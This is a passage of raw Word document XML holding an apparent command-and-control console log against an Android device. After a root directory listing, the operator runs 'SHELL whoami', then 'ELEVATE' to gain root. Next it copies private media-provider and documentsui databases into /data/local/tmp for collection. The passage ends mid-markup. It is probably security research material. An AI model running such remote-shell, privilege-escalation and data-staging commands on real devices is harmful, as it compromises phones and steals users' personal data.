    <w:p w14:paraId="0C46F099" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.rc                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888C6DF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.recovery.walleye.rc                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52420FB5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.usb.configfs.rc                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B618385" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.usb.rc                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF6D50" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.zygote32.rc                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40119AC3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.zygote64_32.rc                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6AF8B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lost+found                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D36D93" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">metadata                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F8123" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mnt                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9E24C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">oem                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B5B7E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">persist                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D1E178" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">postinstall                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC37344" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">proc                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29B3CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">res                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E36683" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E07B6C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sbin                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB8AD2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sdcard                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583950B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">storage                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D944D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sys                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F327181" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">system                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D391857" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ueventd.rc                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267771B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vendor                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465114CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F982669" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL whoami                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06627B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL whoami"                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD0ECE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: u0_a118                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DD413" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D8B36" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; ELEVATE                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184253D6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "ELEVATE"                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396FB94" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: OK                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E3782" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4286D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL whoami                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFD244" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL whoami"                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39622723" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: root                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584388B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79E345" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B109F71" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp"                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C16F91" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E1EC63" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls /data/local/tmp/*.db                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00365C39" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls /data/local/tmp/*.db"                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407CAA68" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A23E5D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls /data/local/tmp                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F2AD6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls /data/local/tmp"                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B1E4D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: a64.ko                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6192E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">external.db                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20F62C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msm_g711tlaw.ko                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90B527" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">swap                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82515D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tc                                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E783F77" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46279A9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls /data/data/com/android/providers/media                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78633F77" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls /data/data/com/android/providers/media"                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286AE8C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2DD24" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL whoami                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A9554" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL whoami"                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F9CE4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: root     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A42CDD1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDE8F7D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls /data/data/com/android/providers/media                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833699B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls /data/data/com/android/providers/media"                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376725D1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2299D9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL whoami                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974C1EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL whoami"                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F403508" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: root                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F3384" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA85752" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls -l /data/data/com.android.providers.media/databases/external.db                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612AD51B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls -l /data/data/com.android.providers.media/databases/external.db"                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E5170" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: -rw-rw---- 1 u0_a6 u0_a6 184320 2019-05-17 15:45 /data/data/com.android.providers.media/databases/external.db        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C70D5A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17582378" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B556A0B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp"                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D1EB5C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EE736" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls /data/local/tmp                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38E4B4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls /data/local/tmp"                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA77F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: a64.ko                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C885B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">external.db                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE6831" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msm_g711tlaw.ko                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AFE7CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">swap                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CB907" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tc             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3330A9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DEAB9F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216ABFA4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msm_g711tlaw.ko                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746B7FE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">swap                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D54B5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tc                                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D775788" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665C397" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.media/databases/internal.db /data/local/tmp                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D40C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.media/databases/internal.db /data/local/tmp"                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A4891" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3EA057" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.documentsui/databases/lastAccess.db                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A1640" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.documentsui/databases/lastAccess.db"                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35547DA0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05643DF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
